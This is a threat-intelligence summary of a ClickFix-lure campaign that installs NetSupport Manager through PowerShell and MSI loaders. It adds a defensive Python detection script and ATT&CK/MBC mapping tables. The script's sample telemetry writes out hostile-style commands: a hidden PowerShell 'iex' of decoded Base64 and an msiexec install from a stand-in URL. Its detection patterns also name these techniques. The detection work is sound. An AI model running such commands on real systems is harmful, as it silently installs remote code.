EXECUTIVE SUMMARY:
Researchers have uncovered a surge in malicious activity involving the legitimate remote administration tool NetSupport Manager, repurposed by threat actors to gain unauthorized access and full control of target systems. The attacker workflow begins with a socially engineered lure that directs users to a fake ClickFix-branded page designed to trick victims into executing commands directly via the Windows Run Prompt. Once executed, the adversary initiates a sequence of hidden loader stages that ultimately deploy NetSupport and establish persistent remote control.
The attack chain begins when a victim is redirected to a fraudulent page that instructs them to run a command in the Windows Run dialog. That command typically launches a PowerShell-based loader which decodes embedded Base64 blobs, writes decoded payloads to hidden system folders, and drops a shortcut in the Start-up menu to achieve persistence. The loader validates file integrity, executes the NetSupport client binary, and removes traces such as entries from the RunMRU registry to hinder forensic discovery. Variants use MSI installers executed via msiexec.exe that contain Base64 payloads reconstructed through arithmetic operations on embedded bytes and then executed via Invoke-Expression. Post-deployment activity shows NetSupport clients connecting to remote connectivity servers and using legitimate product components for command-and-control. Operators observed across multiple clusters vary their infrastructure and licensing, often leveraging bulletproof hosting and geographically distributed servers to resist takedown.
This campaign underscores how adversaries are leveraging legitimate remote monitoring and management tools for malicious purposes, coupling them with stealth loaders and layered obfuscation to gain persistent access. Organizations should treat NetSupport deployments with heightened scrutiny, implement controls to restrict non-approved RMM tools, disable or monitor Run prompt usage, and ensure that endpoint detection technologies can detect anomalous loader behaviours and NetSupport clients. Early detection and response will be critical to disrupting these intrusions before lateral movement or further compromise occurs.
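As an added illustration of the detection side of the chain described above (example code written for this summary, not from the referenced reports, the operators, or NetSupport), the script below triages a small set of constructed endpoint events against the loader behaviours the summary names: PowerShell launched from the Run dialog with Base64 decoding or Invoke-Expression on its command line, msiexec.exe fetching a remote MSI, a shortcut written into the Startup folder, RunMRU cleanup, and a NetSupport client executing from a user-writable path. The event schema is a simplified Sysmon-like model assumed for the example; the client executable name client32.exe is the standard NetSupport Manager client name rather than something the summary states; every sample event, path, SID and the host example.invalid is constructed.

```python
"""Triage constructed endpoint telemetry for ClickFix -> NetSupport loader stages.

Event model is a simplified Sysmon-style record (assumed for this example).
All sample events below are constructed, not taken from a real incident.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str           # "process", "file" or "registry"
    parent: str = ""    # parent image for process events
    image: str = ""     # image that performed the action
    cmdline: str = ""   # command line for process events
    target: str = ""    # file path or registry key touched


STARTUP_DIR = "\\start menu\\programs\\startup\\"   # per-user Startup folder
RUNMRU_KEY = "\\explorer\\runmru"                   # Run-dialog history key
NETSUPPORT_CLIENT = "client32.exe"                  # assumption: standard client name
PS_SUSPICIOUS = re.compile(
    r"-e(nc|ncodedcommand)?\s|frombase64string|invoke-expression|\biex\b", re.I)


def ps_from_run_prompt(e: Event) -> bool:
    """ClickFix stage: explorer.exe (Run dialog host) spawns PowerShell that
    decodes Base64 or uses Invoke-Expression."""
    return (e.kind == "process"
            and e.parent.lower().endswith("explorer.exe")
            and "powershell" in e.image.lower()
            and PS_SUSPICIOUS.search(e.cmdline) is not None)


def msiexec_remote_msi(e: Event) -> bool:
    """MSI variant: msiexec.exe installing a package from a URL."""
    return (e.kind == "process"
            and e.image.lower().endswith("msiexec.exe")
            and re.search(r"https?://", e.cmdline, re.I) is not None)


def startup_lnk_dropped(e: Event) -> bool:
    """Persistence: a .lnk written under the Startup folder."""
    t = e.target.lower()
    return e.kind == "file" and t.endswith(".lnk") and STARTUP_DIR in t


def runmru_cleared(e: Event) -> bool:
    """Anti-forensics: RunMRU values removed after the Run-dialog launch."""
    return e.kind == "registry" and RUNMRU_KEY in e.target.lower()


def netsupport_client_userpath(e: Event) -> bool:
    """NetSupport client started from outside Program Files."""
    img = e.image.lower()
    return (e.kind == "process" and img.endswith(NETSUPPORT_CLIENT)
            and not img.startswith("c:\\program files"))


RULES = [
    ("run_prompt_powershell", ps_from_run_prompt),
    ("msiexec_remote_msi", msiexec_remote_msi),
    ("startup_lnk_dropped", startup_lnk_dropped),
    ("runmru_cleared", runmru_cleared),
    ("netsupport_client_userpath", netsupport_client_userpath),
]


def triage(events):
    """Return {rule_name: [event indices]} for every rule that fired."""
    hits = {}
    for i, e in enumerate(events):
        for name, pred in RULES:
            if pred(e):
                hits.setdefault(name, []).append(i)
    return hits


def chain_score(hits) -> int:
    """Distinct chain stages seen on one host; three or more is treated here as
    a likely ClickFix -> NetSupport intrusion rather than a lone odd event."""
    return len(hits)


# Constructed sample telemetry from one host (event 4 is benign noise).
SAMPLE_EVENTS = [
    Event("process", parent=r"C:\Windows\explorer.exe",
          image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline='powershell -w hidden -c "iex([Text.Encoding]::UTF8.GetString('
                  "[Convert]::FromBase64String('QUFBQQ==')))\""),
    Event("file", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          target=r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu"
                 r"\Programs\Startup\Updater.lnk"),
    Event("registry", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          target=r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows"
                 r"\CurrentVersion\Explorer\RunMRU\a"),
    Event("process", parent=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          image=r"C:\Users\alice\AppData\Roaming\Microsoft\cache\client32.exe",
          cmdline="client32.exe"),
    Event("process", parent=r"C:\Windows\explorer.exe",
          image=r"C:\Windows\System32\notepad.exe", cmdline="notepad.exe"),
    Event("process", parent=r"C:\Windows\explorer.exe",
          image=r"C:\Windows\System32\msiexec.exe",
          cmdline="msiexec /i https://example.invalid/setup.msi /qn"),
]


def triage_sample():
    """Run the rules over the constructed sample; used by main and the test."""
    return triage(SAMPLE_EVENTS)


if __name__ == "__main__":
    h = triage_sample()
    for name, idx in h.items():
        print(f"{name}: events {idx}")
    print("stages observed:", chain_score(h))
```

Each rule is deliberately tied to one stage the summary describes, so a single hit (for instance msiexec with a URL, which some software deployment tools also do) stays a low-confidence signal, while several stages from the same host in a short window is what should page an analyst. In production the same predicates map onto Sysmon event IDs 1 (process), 11 (file) and 12/13 (registry), or the equivalent EDR telemetry.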
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| --- | --- | --- | --- |
| Execution | T1204.004 | User Execution | Malicious Copy and Paste |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1547.009 | Boot or Logon Autostart Execution | Shortcut Modification |
| Defense Evasion | T1027.013 | Obfuscated Files or Information | Encrypted/Encoded File |
| Defense Evasion | T1070.004 | Indicator Removal on Host | File Deletion |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
| --- | --- | --- |
| Anti-Behavioral Analysis | B0001 | Debugger Detection |
| Anti-Static Analysis | B0032 | Executable Code Obfuscation |
| Collection | E1113 | Screen Capture |
| Command and Control | B0030 | C2 Communication |
| Defense Evasion | F0001 | Software Packing |
| Defense Evasion | E1055 | Process Injection |
| Discovery | B0013 | Analysis Tool Discovery |
| Execution | B0011 | Remote Commands |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
REFERENCES:
The following reports contain further technical details: